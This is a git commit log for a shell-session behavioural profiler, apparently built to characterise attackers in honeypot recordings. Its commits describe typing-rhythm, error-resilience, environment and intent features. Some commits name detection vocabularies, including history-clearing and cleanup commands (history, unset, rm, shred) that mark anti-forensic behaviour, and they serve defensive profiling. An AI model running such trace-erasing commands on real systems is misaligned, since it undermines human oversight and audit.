Excludes Tier B (8 cross-session primitives) and Tier C (toolchain.*)
by explicit allow-list and prefix filter.

Three checks:
* every Tier-A primitive is covered (forward direction)
* no extractor set drifts from the registry (reverse, catches typos)
* Tier-A count == 37 (design doc invariant)

CI now fails before a registry addition ships without a feature
function.
2026-05-08 18:30:50 -04:00
f10931f24d test(profiler/behave_shell): Phase G grid lockdown + completion log
Widen calibration binding from PHASE_ABCDEF_PRIMITIVES (25) to
PHASE_ABCDEFG_PRIMITIVES (28 hard). Three Phase G primitives that
emit on any session-with-commands ride the hard gate:

* operational.opsec_discipline
* operational.cleanup_behavior
* emotional_valence.stress_response

The remaining five Phase G primitives ride a new
PHASE_G_CONDITIONAL_PRIMITIVES because their sample-size floors make
them legitimately absent from short shards:

* operational.objective                  (≥ 3 classified commands)
* operational.multi_actor_indicators     (≥ 8 commands)
* emotional_valence.arousal              (typing bursts)
* emotional_valence.valence              (≥ 80 typed letters)
* emotional_valence.frustration_venting  (≥ 30 typed letters)

Backwards-compat alias PHASE_ABCDEF_PRIMITIVES kept. Phase G
completion log + checkbox flips in BEHAVE-EXTRACTOR.md.

Tier-A corpus delta: all 37 Tier-A primitives now emit. Phase H
(full-corpus lockdown + v0 release) is next.
2026-05-08 16:40:13 -04:00
79f253c969 feat(profiler/behave_shell): G.8 emotional_valence.frustration_venting
Binary read of ctx.obscenity_hits (G.0 lexical counter):
* detected — obscenity_hits ≥ 1
* none     — zero hits

Skip below FRUST_VENT_MIN_TYPED_CHARS (30). Confidence hard-capped at
0.5: 0.40 when detected, 0.50 only when cleanly absent over ≥ 200
typed letters, 0.30 otherwise.
2026-05-08 16:37:29 -04:00
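The value and confidence rules in the G.8 commit above reduce to a few comparisons. A minimal sketch, assuming a single typed-letter count feeds both the 30-character skip floor and the 200-letter full-confidence floor. FULL_CONFIDENCE_MIN_LETTERS is a hypothetical constant name.

```python
from typing import Optional, Tuple

FRUST_VENT_MIN_TYPED_CHARS = 30
FULL_CONFIDENCE_MIN_LETTERS = 200  # hypothetical name; value from the commit


def frustration_venting(obscenity_hits: int, typed_letters: int) -> Optional[Tuple[str, float]]:
    """Return (value, confidence), or None when the sample is too small."""
    if typed_letters < FRUST_VENT_MIN_TYPED_CHARS:
        return None
    if obscenity_hits >= 1:
        return ("detected", 0.40)
    if typed_letters >= FULL_CONFIDENCE_MIN_LETTERS:
        return ("none", 0.50)
    return ("none", 0.30)
```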
40a283a7ec feat(profiler/behave_shell): G.7 emotional_valence.stress_response
Compare median post-error intra-command IATs against baseline
(commands not immediately following an errored command):

* ratio ≥ STRESS_EUSTRESS_RATIO_MIN (1.20) → eustress_positive
* ratio ≤ 1/STRESS_DISTRESS_RATIO_MIN     → distress_negative
* otherwise                                → none

Confidence hard-capped at 0.5; 0.30 below
STRESS_MIN_ERRORED_WITH_IATS (2).
2026-05-08 16:36:34 -04:00
d4dc7dff81 feat(profiler/behave_shell): G.6 emotional_valence.arousal
high_agitated when any of:
  * caps_run_max ≥ 5
  * bang_run_max ≥ 3
  * fastest typing burst median IAT < 0.06s with ≥ 30 IATs total

low_calm when slowest qualifying burst median IAT > 0.30s with ≥ 30
IATs. Else medium_engaged. Confidence hard-capped at 0.5; 0.30 below
AROUSAL_MIN_IATS.
2026-05-08 16:35:29 -04:00
3ba7e22b71 feat(profiler/behave_shell): G.5 emotional_valence.valence
Soft primitive — pure ratio over G.0 lexical counters:

* positive — positive_lex_hits > negative + obscenity, ≥ VALENCE_MIN_HITS
* negative — (negative + obscenity) > positive, sum ≥ VALENCE_MIN_HITS
* neutral  — fall-through

Skip below VALENCE_MIN_TYPED_CHARS (80). Confidence hard-capped at
EMOTIONAL_VALENCE_CONFIDENCE_CAP (0.5) inside the feature function;
0.30 below VALENCE_FULL_CONFIDENCE_MIN (200). Cap is registry
convention.
2026-05-08 16:34:27 -04:00
acf8382bcf feat(profiler/behave_shell): G.4 operational.multi_actor_indicators
Compare median intra-command IATs of the two temporal halves of the
session. ≥ MULTI_ACTOR_HALF_MIN_COMMANDS (4) per half required;
relative delta > MULTI_ACTOR_HANDOFF_DELTA (0.5) → handoff_detected.

team_coordinated is Tier B (cross-session); never emitted from a
single session. Confidence 0.55 with both halves ≥ 8 commands; 0.40
otherwise.
2026-05-08 16:33:15 -04:00
17b53dad4d feat(profiler/behave_shell): G.3 operational.cleanup_behavior
* thorough — ≥ CLEANUP_THOROUGH_MIN_DISTINCT (3) distinct
  cleanup-family hashes in tail-CLEANUP_TAIL_K (5).
* partial  — 1-2 distinct.
* none     — zero hits.

Adjacent to E.4's binary exit_behavior=cleanup; G.3 graduates the
intensity. Confidence 0.55 above 8 commands; 0.35 below.
2026-05-08 16:32:08 -04:00
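The G.3 grading in the commit above counts distinct cleanup-family commands in the session tail. In this sketch plain tokens stand in for the first-token hashes the real extractor compares, and the token set is borrowed from the exit_behavior commit as an assumption. Skipping on an empty session and reading "above 8 commands" as "at least 8" are also assumptions.

```python
from typing import Optional, Sequence, Tuple

CLEANUP_THOROUGH_MIN_DISTINCT = 3
CLEANUP_TAIL_K = 5
FULL_CONFIDENCE_MIN_COMMANDS = 8  # hypothetical constant name

# Assumed cleanup family; the real code matches precomputed hashes.
CLEANUP_TOKENS = frozenset({"history", "unset", "rm", "shred", "clear", "kill"})


def cleanup_behavior(first_tokens: Sequence[str]) -> Optional[Tuple[str, float]]:
    """Grade cleanup intensity from the last CLEANUP_TAIL_K commands."""
    if not first_tokens:
        return None
    tail = first_tokens[-CLEANUP_TAIL_K:]
    distinct = len({token for token in tail if token in CLEANUP_TOKENS})
    if distinct >= CLEANUP_THOROUGH_MIN_DISTINCT:
        value = "thorough"
    elif distinct >= 1:
        value = "partial"
    else:
        value = "none"
    enough = len(first_tokens) >= FULL_CONFIDENCE_MIN_COMMANDS
    return (value, 0.55 if enough else 0.35)
```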
337c7392b9 chore: untrack accidentally-committed threatfox-api.json
Slipped in via `git add -A` in the G.2 commit. Local artifact, never
intended for tracking.
2026-05-08 16:30:18 -04:00
09f598ce47 feat(profiler/behave_shell): G.2 operational.opsec_discipline
* careful — operator hits OPSEC_HISTORY_TOKENS AND tail-K commands
  include _CLEANUP_TOKEN_HASHES (re-imported from temporal.py).
* learning — history hit without cleanup-tail follow-through.
* careless — no history-clearing vocabulary at all.

Confidence 0.45 (small lexicon, soft); 0.30 below
MIN_COMMANDS_FOR_FULL_CONFIDENCE.
2026-05-08 16:29:48 -04:00
c11f3605be feat(profiler/behave_shell): G.1 operational.objective
Per-command intent classification via the G.0 lexicon
(`destructive > persistence > exfil > lateral > recon` precedence);
majority vote across classified commands. Skip emission below
INTENT_MIN_COMMANDS=3 classified hits. Confidence 0.40 below
INTENT_FULL_CONFIDENCE_MIN=6, 0.60 above.
2026-05-08 16:28:45 -04:00
289a64014c feat(profiler/behave_shell): G.0 intent lexicon + lexical counter pass
Phase G shared infrastructure (no primitive yet emitted):

* New `_intent.py` — five precomputed first-token-hash sets (recon /
  exfil / persistence / lateral / destructive) with documented
  precedence, plus opsec-history and three lexeme sets (positive /
  negative / obscenity) for the typed-text counter pass. Stop words
  that collide with registry value vocabulary (`no`, `hell`, `ok`)
  are deliberately excluded — the PII regression test catches such
  collisions.

* `_typed_char_histograms()` extended with five integer counters
  populated in the same single-pass walk: `obscenity_hits`,
  `positive_lex_hits`, `negative_lex_hits`, `caps_run_max`,
  `bang_run_max`. Longest-suffix match against bounded lexicon
  (`LEXEME_MAX_LEN`); paste-class events excluded.

* `SessionContext` widened by the same five fields. Drives G.5
  (valence), G.6 (arousal), G.8 (frustration_venting) without retaining
  raw operator text.

* Bump twisted >= 26.4.0rc2 to clear CVE-2026-42304 (pre-existing,
  caught by pre-commit pip-audit). Adjust ftp template type-ignore
  code from attr-defined to misc to match the new Twisted typing.

PII discipline: same shape as F.4 — fixed-vocabulary integer counters
on ctx, never on observations.
2026-05-08 16:27:25 -04:00
a25f4a890d test(profiler/behave_shell): Phase F + E.4 grid lockdown + completion log
Widens the binding calibration set from PHASE_ABCDE_PRIMITIVES (20)
to PHASE_ABCDEF_PRIMITIVES (25). The five new entries:

* environmental.shell_type (per-shard hard gate)
* environmental.terminal_multiplexer (per-shard hard gate)
* environmental.keyboard_layout (per-shard hard gate; PII boundary
  lifted by ANTI; emits all 4 registry values)
* environmental.numpad_usage (per-shard hard gate)
* temporal.lifecycle_markers.exit_behavior (resolution of the E.4
  hold; uses Command.followed_by_prompt from F.0)

environmental.locale joins a new PHASE_F_CONDITIONAL_PRIMITIVES set
(only fires on shards with an env / locale dump in the output).

Phase F completion log appended to BEHAVE-EXTRACTOR.md. The original
F.0 row hinted at D.0 subsumption; reversed in the log — D.0 is
enriched, not subsumed (regex catches errors when PS1 is suppressed).

Tier-A corpus delta: 25 of 37 primitives now emit. Phase G is next.
2026-05-04 00:44:22 -04:00
51ecd0924e feat(profiler/behave_shell): emit temporal.lifecycle_markers.exit_behavior
Resolves the E.4 hold from Phase E. F.0's Command.followed_by_prompt
gives us the exit-code proxy (prompt-after-last-command) we couldn't
get in Phase E.

Logic: last command without trailing prompt → abrupt; first_token_hash
in {exit, logout, quit, logoff} → graceful; any of the last K=3
commands' first_token_hash in {history, unset, rm, shred, clear, kill}
→ cleanup; else → graceful (clean Ctrl-D / window close).
2026-05-04 00:42:25 -04:00
c8166a6071 feat(profiler/behave_shell): emit environmental.numpad_usage
Sliding-window scan over single-char digit input events. A run of
NUMPAD_RUN_MIN (4) consecutive digit events whose pairwise IATs are
all ≤ NUMPAD_FAST_IAT_S (50ms) → detected. Otherwise → not_detected.
Skips below NUMPAD_MIN_TYPED_CHARS (50) typed chars. Confidence cap
0.50 per the registry's weak-signal flag.
2026-05-04 00:40:42 -04:00
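The digit-run scan in the numpad_usage commit above can be sketched as a single pass over input events. The constants come from the commit message. The (timestamp, text) event shape, the reset on any non-digit event, and counting single-character events as "typed chars" are assumptions, and confidence is left out.

```python
from typing import Optional, Sequence, Tuple

NUMPAD_RUN_MIN = 4
NUMPAD_FAST_IAT_S = 0.050
NUMPAD_MIN_TYPED_CHARS = 50


def numpad_usage(events: Sequence[Tuple[float, str]]) -> Optional[str]:
    """events: (timestamp_seconds, text) input events in chronological order."""
    typed_chars = sum(1 for _, text in events if len(text) == 1)
    if typed_chars < NUMPAD_MIN_TYPED_CHARS:
        return None
    run = 0
    prev_ts = 0.0
    for ts, text in events:
        is_digit = len(text) == 1 and text in "0123456789"
        if not is_digit:
            run = 0  # a non-digit event breaks the run
            continue
        # Extend the run only if this digit followed the previous one quickly.
        run = run + 1 if run and ts - prev_ts <= NUMPAD_FAST_IAT_S else 1
        prev_ts = ts
        if run >= NUMPAD_RUN_MIN:
            return "detected"
    return "not_detected"
```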
cd7c7ea5a2 feat(profiler/behave_shell): emit environmental.keyboard_layout
ANTI authorised dropping the PII boundary for this primitive. ctx
gains typed_unigram_counts / typed_bigram_counts / typed_letter_count
populated during the existing single-pass input walk (paste-class
events excluded).

Two-axis classifier:
* layout-artefact unigrams take priority — q rate above floor with
  low English saturation → azerty; z above floor with y below → qwertz
* fallback to English-bigram saturation: ≥ floor → qwerty, else other

Sample-size floor 200 typed letters; bigram histogram capped at
top-64 to bound memory. Confidence cap stays moderate (0.40-0.55) —
heuristic discriminator.
2026-05-04 00:38:24 -04:00
b7ff5d2cc1 feat(profiler/behave_shell): emit environmental.locale
Searches ANSI-stripped output for LANG / LC_ALL / LC_CTYPE envvar
substrings emitted by env / locale / printenv. Highest-priority key
wins (LC_ALL > LANG > LC_CTYPE); POSIX value normalised to BCP-47:
en_US.UTF-8 → en-US, pt_BR.UTF-8 → pt-BR, C/POSIX → und. Free-string
registry value emitted directly.

PII discipline: only the parsed locale value enters observations;
surrounding output is read once for matching and dropped.
2026-05-04 00:35:31 -04:00
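The key priority and POSIX-to-BCP-47 normalisation described in the locale commit above might be sketched as follows. The input is assumed to be output text that has already been ANSI-stripped. The regex, the helper names, and the choice to keep the first occurrence of each key are assumptions.

```python
import re
from typing import Dict, Optional

_PRIORITY = ("LC_ALL", "LANG", "LC_CTYPE")
# Matches KEY=value with optional double quotes; empty values do not match.
_ENV_RE = re.compile(r'\b(LC_ALL|LANG|LC_CTYPE)="?([A-Za-z0-9_.@-]+)"?')


def normalise_posix_locale(value: str) -> str:
    """en_US.UTF-8 -> en-US; C / POSIX -> und."""
    base = value.split(".", 1)[0].split("@", 1)[0]
    if base in ("C", "POSIX"):
        return "und"
    return base.replace("_", "-")


def detect_locale(output: str) -> Optional[str]:
    """Return the normalised value of the highest-priority key found."""
    found: Dict[str, str] = {}
    for key, value in _ENV_RE.findall(output):
        found.setdefault(key, value)  # keep the first occurrence per key
    for key in _PRIORITY:
        if key in found:
            return normalise_posix_locale(found[key])
    return None
```

Only the returned locale string leaves the function, which matches the PII note in the commit: the surrounding output is read for matching and then dropped.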
4257f7b6e2 feat(profiler/behave_shell): emit environmental.terminal_multiplexer
Scans RAW output (multiplexer escapes are themselves ANSI; never
strip first) for tmux markers (DCS passthrough, focus-reporting,
window-title with tmux marker) and screen markers (DCS, screen-OSC).
Detected → tmux/screen at 0.85; otherwise → none at 0.55. Skips
emission entirely when no commands — silence on a pure-echo or
empty session, per the smoke gates.

When both detected (nested mux), prefer tmux.
2026-05-04 00:33:44 -04:00
07ff5ff0c9 feat(profiler/behave_shell): emit environmental.shell_type
Classifies each prompt in ctx.prompt_lines and emits the mode (most
frequent class): $/# → bash; % → zsh; > with 'PS ' prefix →
powershell; > with 'C:\' substring → cmd.exe; > otherwise → fish.
New _features/environmental.py module opens Phase F.
2026-05-04 00:30:24 -04:00
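The per-prompt rules in the shell_type commit above, followed by a most-frequent vote, can be sketched like this. The mapping comes from the commit message. Deriving the suffix character from the stripped line (rather than from PromptLine.suffix_char), the function names, and returning None when no prompt classifies are assumptions.

```python
from collections import Counter
from typing import Iterable, Optional


def classify_prompt(raw_line: str) -> Optional[str]:
    """Classify one ANSI-stripped prompt line by its trailing character."""
    line = raw_line.rstrip()
    if not line:
        return None
    suffix = line[-1]
    if suffix in "$#":
        return "bash"
    if suffix == "%":
        return "zsh"
    if suffix == ">":
        if line.startswith("PS "):
            return "powershell"
        if "C:\\" in line:
            return "cmd.exe"
        return "fish"
    return None


def shell_type(prompt_lines: Iterable[str]) -> Optional[str]:
    """Return the most frequent per-prompt class, or None without votes."""
    votes = Counter(c for c in map(classify_prompt, prompt_lines) if c)
    if not votes:
        return None
    return votes.most_common(1)[0][0]
```

Checking the 'PS ' prefix before the 'C:\' substring matters, since a PowerShell prompt usually contains both.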
1ff02f0c77 feat(profiler/behave_shell): F.0 prompt-line detector
Adds PromptLine dataclass + extract_prompt_lines() helper. PromptLine
carries ts, suffix_char ($/#/%/>), raw_line (ANSI-stripped, capped),
is_root flag. Populated during the existing single-pass output-window
walk; SessionContext gains prompt_lines, Command gains
followed_by_prompt.

PII trade-off (ANTI-authorised at Phase F): PS1 text retained on ctx
so F.1 / F.3 / E.4 can read it. Capped at PROMPT_LINE_MAX_CHARS=256.
Observations still only carry derived primitive values.

D.0's regex error helpers stay alongside (NOT subsumed) — they fire
even when PS1 echo is suppressed. F.0 enriches D.0 rather than
replacing it.
2026-05-04 00:29:08 -04:00
b7534c311a docs(behave): cross-reference Phase F.0 with held E.4 and landed D.0
F.0's row in BEHAVE-EXTRACTOR.md was forward-only — readers landing
on Phase F couldn't tell that F.0 also has a backlog (E.4 held, D.0
subsumption). Add a 'Carry-overs F.0 must unblock' section to the
Phase F prelude and a back-reference on the F.0 checkbox in the
implementation order checklist.
2026-05-04 00:17:37 -04:00
96a4039366 test(profiler/behave_shell): Phase E grid lockdown + completion log (E.4 held)
Widens the binding calibration set from PHASE_ABCD_PRIMITIVES (17) to
PHASE_ABCDE_PRIMITIVES (20). The three shipped Phase E primitives
(session_duration, escalation_pattern, landing_ritual) join the
per-shard hard gate.

E.4 (temporal.lifecycle_markers.exit_behavior) is held at ANTI's
direction pending Phase F.0's prompt parser — abrupt-vs-cleanup
needs exit-code visibility to be honest, and first-token membership
alone over-fires on benign rm / clear mid-session. E.4 picks up at
the tail of Phase F.

Phase E completion log appended to BEHAVE-EXTRACTOR.md; E.1-E.3
checkboxes flipped, E.4 left unchecked with a held note.
2026-05-04 00:16:33 -04:00
1341df2705 feat(profiler/behave_shell): emit temporal.lifecycle_markers.landing_ritual
Inspect the first N commands; if at least K of their first_token_hashes
match the recon-survey vocabulary (uname/id/whoami/pwd/hostname/w/who),
emit present, else absent. Hashes precomputed at module load; PII-safe.
v0.1 N=5, K=2.
2026-05-04 00:15:05 -04:00
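The landing_ritual check in the commit above compares hashes of the first few commands against a precomputed vocabulary. In this sketch SHA-256 stands in for the project's hash scheme, which the commit does not specify. token_hash and the constant names are hypothetical, and the real feature may skip empty sessions instead of returning absent.

```python
import hashlib
from typing import Sequence

LANDING_FIRST_N = 5   # v0.1 N from the commit message
LANDING_MIN_HITS = 2  # v0.1 K from the commit message


def token_hash(token: str) -> str:
    # Stand-in hash; the extractor's real scheme is not given in the log.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


# Precomputed once at module load, so no raw tokens are compared at runtime.
_RECON_HASHES = frozenset(
    token_hash(t) for t in ("uname", "id", "whoami", "pwd", "hostname", "w", "who")
)


def landing_ritual(first_token_hashes: Sequence[str]) -> str:
    """Return 'present' if at least K of the first N commands are recon."""
    head = first_token_hashes[:LANDING_FIRST_N]
    hits = sum(1 for h in head if h in _RECON_HASHES)
    return "present" if hits >= LANDING_MIN_HITS else "absent"
```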
d40495d71b feat(profiler/behave_shell): emit temporal.escalation_pattern
Bin commands into non-overlapping windows of width
max(ESCALATION_WINDOW_MIN_S, duration_s / ESCALATION_WINDOW_TARGET).
CV of per-window counts + zero-window fraction classify bursty /
sustained / erratic. v0.1; corpus re-tune deferred.
2026-05-04 00:13:45 -04:00
627fa59c15 feat(profiler/behave_shell): emit temporal.session_duration
Bucket ctx.duration_s against SESSION_DURATION_SHORT_MAX (60s) /
MEDIUM_MAX (600s) / LONG_MAX (3600s); else marathon. Direct
measurement, confidence 0.85. Skip emission only when no commands
and zero duration. New _features/temporal.py module opens Phase E.
2026-05-04 00:10:57 -04:00
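The bucketing in the session_duration commit above is a threshold ladder. A minimal sketch: the thresholds, the marathon value, and the 0.85 confidence come from the commit message, while the bucket names short / medium / long are inferred from the constant names and the inclusive upper bounds are an assumption.

```python
from typing import Optional, Tuple

SESSION_DURATION_SHORT_MAX = 60.0
SESSION_DURATION_MEDIUM_MAX = 600.0
SESSION_DURATION_LONG_MAX = 3600.0
SESSION_DURATION_CONFIDENCE = 0.85  # hypothetical constant name


def session_duration(duration_s: float, command_count: int) -> Optional[Tuple[str, float]]:
    """Bucket a session length; skip only for an empty zero-length session."""
    if command_count == 0 and duration_s == 0:
        return None
    if duration_s <= SESSION_DURATION_SHORT_MAX:
        value = "short"
    elif duration_s <= SESSION_DURATION_MEDIUM_MAX:
        value = "medium"
    elif duration_s <= SESSION_DURATION_LONG_MAX:
        value = "long"
    else:
        value = "marathon"
    return (value, SESSION_DURATION_CONFIDENCE)
```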
46775fc0e5 test(profiler/behave_shell): Phase D calibration-grid lockdown + completion log
Widens the binding calibration set from PHASE_ABC_PRIMITIVES (13) to
PHASE_ABCD_PRIMITIVES (17). The four unconditional Phase D primitives
(cognitive_load, exploration_style, planning_depth, tool_vocabulary)
join the per-shard hard gate. The three error_resilience.* primitives
are conditional on at least one errored command in the shard and
tracked in PHASE_D_CONDITIONAL_PRIMITIVES — excluded from the
per-shard required-emission set, included in the cross-class
discrimination check.

cognitive_load empirical re-tune deferred to the next
BEHAVE_CALIBRATION_DIR run; v0.1 thresholds ship.

Phase D completion log appended to BEHAVE-EXTRACTOR.md; Phase D
checkboxes flipped to [x].
2026-05-04 00:03:46 -04:00
0fba6b6113 feat(profiler/behave_shell): emit cognitive.error_resilience.fallback_to_man
For each errored command, check whether the next command's
first_token_hash is in {man, help, info} (precomputed at module
load). At least one match → present, else absent. The --help / -h
flag forms aren't first tokens; v0.2 will reconsider once arg-token
hashing is justified by corpus.
2026-05-04 00:01:45 -04:00
8183218d29 feat(profiler/behave_shell): emit cognitive.error_resilience.frustration_typing
Compares median within-command IAT for commands following an errored
command vs commands following a successful one. The relative absolute
delta is bucketed into low / moderate / high. Skips when either group
is empty (no errors, or no clean baseline). v0.1; D.8 re-tunes.
2026-05-04 00:00:36 -04:00
b704352783 feat(profiler/behave_shell): emit cognitive.error_resilience.retry_tactic
Modal response across Command.errored=True commands:
* same first_token_hash on next command → rerun
* different first_token_hash         → switch
* no next command                    → abort
Tiebreak in registry order. The fourth registry value 'modify'
requires within-command arg diffing (PII boundary); deferred to v0.2.
2026-05-03 23:58:58 -04:00
f286c84d95 feat(profiler/behave_shell): emit cognitive.tool_vocabulary
Absolute distinct first_token_hash count, bucketed against
TOOL_VOCAB_NARROW_MAX / TOOL_VOCAB_BROAD_MIN. v0.1; D.8 re-tunes.
2026-05-03 23:56:22 -04:00
6c2e4ada83 feat(profiler/behave_shell): emit cognitive.planning_depth
Distribution of inter-command IATs bucketed against IKI_THINK_MAX_S
(deep) and INTER_CMD_INSTANT_MAX (reactive); fall-through is shallow.
v0.1 thresholds; D.8 re-tunes.
2026-05-03 23:55:16 -04:00
2254651270 feat(profiler/behave_shell): emit cognitive.exploration_style
Two-axis classification over the first_token_hash sequence:
repetition_rate (drilling) vs backtrack_rate (jumping among prior
tools). chaotic/targeted/methodical buckets. v0.1 thresholds; D.8
re-tunes.
2026-05-03 23:54:03 -04:00
f948e10830 feat(profiler/behave_shell): emit cognitive.cognitive_load
Composite over three [0, 1]-clipped sub-signals (chunking variance,
error rate from D.0's Command.errored, pace variability), mean-aggregated
and bucketed against COGNITIVE_LOAD_LOW_MAX / COGNITIVE_LOAD_MEDIUM_MAX.
Components missing data drop out of the mean rather than zeroing it.

v0.1 thresholds; D.8 re-tunes once D.2-D.7 are stable. Confidence
held at 0.60 (composite over soft sub-signals) and halved below the
5-command sample-size floor.
2026-05-03 23:52:29 -04:00
601986bd6d feat(profiler/behave_shell): output error-signal helper for Phase D
Lifts the error-signal slice of F.0 forward as a D.0 prelude. ANSI
strip + canonical bash/sh error fingerprints classify each command's
post-execution output window; Command gains errored / output_bytes
fields. PII discipline preserved — only a bool and an int leave the
helper, the stripped output text is dropped on return.

Drives D.1 (cognitive_load error_rate term) and D.5–D.7 (error_resilience
family). Phase F.0 will subsume this with PS1 + exit-code parsing.
2026-05-03 23:46:31 -04:00
bc62e42ce1 feat(profiler/behave_shell): emit motor.shell_mastery.pipe_chaining_depth 2026-05-03 23:34:54 -04:00
4fc980e968 feat(profiler/behave_shell): emit motor.shell_mastery.shortcut_usage 2026-05-03 23:33:07 -04:00
a077cf67c8 feat(profiler/behave_shell): emit motor.shell_mastery.tab_completion 2026-05-03 23:31:20 -04:00
771944830a docs(behave): close Phase B in BEHAVE-EXTRACTOR.md
Tick the four Phase B checkboxes (B.1-B.4) and append a Phase B
completion log inline (per the "append phase logs to design docs"
memory rule). Captures per-primitive confidence ranges, source
signals, and the PII-discipline regression that all four
primitives uphold.

Phase A + Phase B = 10 primitives emitting on every shard;
PHASE_AB_PRIMITIVES is binding for every subsequent phase.
Phase C (motor.shell_mastery.*) lands next.
2026-05-03 21:30:13 -04:00
8161c67ec5 feat(profiler/behave_shell): emit motor.command_chunking
BEHAVE-EXTRACTOR.md Phase B Step B.4. First implementation —
the prototype doesn't ship this primitive.

* SessionContext gains intra_command_iats: per-command tuple of
  IATs between consecutive input events whose timestamps fall
  inside [cmd.start_ts, cmd.end_ts). Excludes the terminator IAT.
  Built by _per_command_iats.
* _features/motor.py:command_chunking(ctx) emits one Observation
  in {fluent, fragmented, single_command}.
  - 0 commands → skip emit
  - 1 command → single_command (registry-allowed point)
  - ≥2 commands → median CV across per-command typed-IATs;
    < CMD_CHUNKING_FLUENT_CV_MAX (0.50) → fluent, else fragmented
  - paste-only sessions (no command has ≥3 typed IATs) → skip emit
    (no honest within-command rhythm to measure)
  Confidence 0.80 / 0.65 / 0.60.
* Calibration grid widened to include motor.command_chunking;
  green across all five shards. Phase B primitive set complete.

Tests: no commands → skip, 1 command → single_command, uniform
typing → fluent, alternating fast/slow → fragmented, paste-only
multi-command → skip emit.
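
The bucketing rules above can be sketched as follows. This is an illustration, not the shipped function: it takes the per-command IAT tuples directly instead of a SessionContext, and the choice of population standard deviation for the CV is an assumption.

```python
from statistics import mean, median, pstdev

CMD_CHUNKING_FLUENT_CV_MAX = 0.50  # value quoted in the commit message
MIN_TYPED_IATS = 3                 # the "≥3 typed IATs" floor from the commit message


def _cv(iats):
    # Coefficient of variation; population stdev is an assumption of this sketch.
    m = mean(iats)
    return pstdev(iats) / m if m > 0 else 0.0


def command_chunking(intra_command_iats):
    """Return a bucket label, or None when the emit should be skipped."""
    if not intra_command_iats:
        return None                      # 0 commands
    if len(intra_command_iats) == 1:
        return "single_command"
    cvs = [_cv(iats) for iats in intra_command_iats if len(iats) >= MIN_TYPED_IATS]
    if not cvs:
        return None                      # paste-only: no within-command rhythm
    return "fluent" if median(cvs) < CMD_CHUNKING_FLUENT_CV_MAX else "fragmented"
```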
2026-05-03 21:29:31 -04:00
d04f91cd8c feat(profiler/behave_shell): emit motor.error_correction
BEHAVE-EXTRACTOR.md Phase B Step B.3. Replaces the prototype's
two-line "0 vs >0 backspaces" placeholder with a backspace-timing
classifier that honours the registry's full vocabulary.

* SessionContext gains backspace_count, backspace_iats (IAT from
  each backspace back to the preceding non-backspace input event),
  and kill_line_count (^U / ^W). Built by _scan_correction_signals,
  which retains only counts and timing aggregates — no character
  data leaves the helper, in line with the BEHAVE PII discipline.
* _features/motor.py:error_correction(ctx) emits one Observation
  in {immediate, deferred, absent, route_around}.
  - 0 backspaces + ≥1 ^U/^W → route_around (rewrite, not correct)
  - 0 backspaces + 0 kill-lines → absent
  - backspaces with median IAT ≤ 500 ms → immediate
  - slower → deferred
  Confidence 0.65 / 0.65 / 0.55 / 0.55.
* < 3 inputs → skip emit.
* Calibration grid widened to include motor.error_correction;
  green across all five shards.

Tests cover all four buckets, the < 3 inputs skip, and the PII
regression (raw command body never appears in the serialised
observation).
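
A hedged sketch of the four-way decision above. The function takes plain counts and timings, not a SessionContext, and the constant names are hypothetical. Skipping when backspaces exist but no timing was captured is an assumption of this sketch.

```python
from statistics import median

IMMEDIATE_MAX_S = 0.500   # "median IAT ≤ 500 ms" from the commit message
MIN_INPUTS = 3            # "< 3 inputs → skip emit"


def error_correction(n_inputs, backspace_count, backspace_iats, kill_line_count):
    """Return a bucket label, or None when the emit should be skipped."""
    if n_inputs < MIN_INPUTS:
        return None
    if backspace_count == 0:
        # Rewriting the line (^U / ^W) counts as routing around the error.
        return "route_around" if kill_line_count >= 1 else "absent"
    if not backspace_iats:
        return None  # assumption: no timing data, nothing honest to report
    return "immediate" if median(backspace_iats) <= IMMEDIATE_MAX_S else "deferred"
```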
2026-05-03 21:27:46 -04:00
0737fcfe93 feat(profiler/behave_shell): emit motor.motor_stability
BEHAVE-EXTRACTOR.md Phase B Step B.2. First principled
implementation — the prototype doesn't ship this primitive at all.

* _features/motor.py:motor_stability(ctx) emits one Observation
  in {steady, variable, tremor}. Reuses ctx.typing_bursts from B.1.
* Tremor proxy: fraction of within-burst IATs below
  TREMOR_FAST_FLOOR_S (30 ms — humans can't sustain sub-50 ms IATs).
  ≥ TREMOR_RATE_MIN (10%) sub-floor → tremor (double-press / motor
  twitch / stuck-key).
* Otherwise median burst CV decides: < CV_STEADY_MAX → steady,
  else → variable. Confidence 0.70 / 0.60 / 0.65.
* No typing bursts or fewer than 5 within-burst IATs → skip emit.
* Calibration grid widened to include motor.motor_stability; green
  across all five shards.

Tests cover all three buckets + skip paths.
2026-05-03 21:25:54 -04:00
d90c8b70ce feat(profiler/behave_shell): emit motor.keystroke_cadence
BEHAVE-EXTRACTOR.md Phase B Step B.1.

* SessionContext gains typing_bursts: tuple[tuple[float, ...], ...]
  built by _split_typing_bursts(iats) — splits at gaps > IKI_THINK_MAX_S
  (1.5s) and drops bursts of fewer than 3 IATs. Mirrors prototype's
  _split_into_bursts at BEHAVE/prototype_extractors/shell/extract.py:275.
* _features/motor.py:keystroke_cadence(ctx) emits one Observation
  in {steady, bursty, hunt_and_peck, machine}. Median CV across
  typing bursts; mean IKI < IKI_MACHINE_MAX_S paired with CV <
  CV_MACHINE_MAX → machine. Confidence 0.85/0.70/0.65/0.60 per the
  prototype's calibration history.
* < MIN_INPUTS_FOR_CADENCE inputs or zero typing bursts → skip
  emission. v0.1 emits only the burst-CV variant; the prototype's
  NAIVE session-CV variant is parked for v0.2.
* Calibration grid widened (PHASE_A_PRIMITIVES → PHASE_AB_PRIMITIVES)
  to include motor.keystroke_cadence. Grid green across all five
  shards.

Tests: too-few-inputs → no emit, all-think-pauses → no burst → no
emit, uniform IATs → steady, sub-5ms → machine, mixed-pace → bursty,
extreme bimodal → hunt_and_peck.
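
The burst split described for `_split_typing_bursts` can be sketched as below. The public name `split_typing_bursts` and `MIN_BURST_IATS` are hypothetical; the 1.5 s gap and the three-IAT floor come from the commit message.

```python
IKI_THINK_MAX_S = 1.5   # gaps longer than this end a burst
MIN_BURST_IATS = 3      # shorter bursts are dropped


def split_typing_bursts(iats):
    """Split inter-arrival times at think-pauses; keep bursts of >= 3 IATs."""
    bursts, current = [], []
    for iat in iats:
        if iat > IKI_THINK_MAX_S:
            if len(current) >= MIN_BURST_IATS:
                bursts.append(tuple(current))
            current = []          # the pause itself belongs to no burst
        else:
            current.append(iat)
    if len(current) >= MIN_BURST_IATS:
        bursts.append(tuple(current))
    return tuple(bursts)
```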
2026-05-03 21:24:13 -04:00
0510cde073 feat(profiler/behave_shell): Phase A — calibration floor green
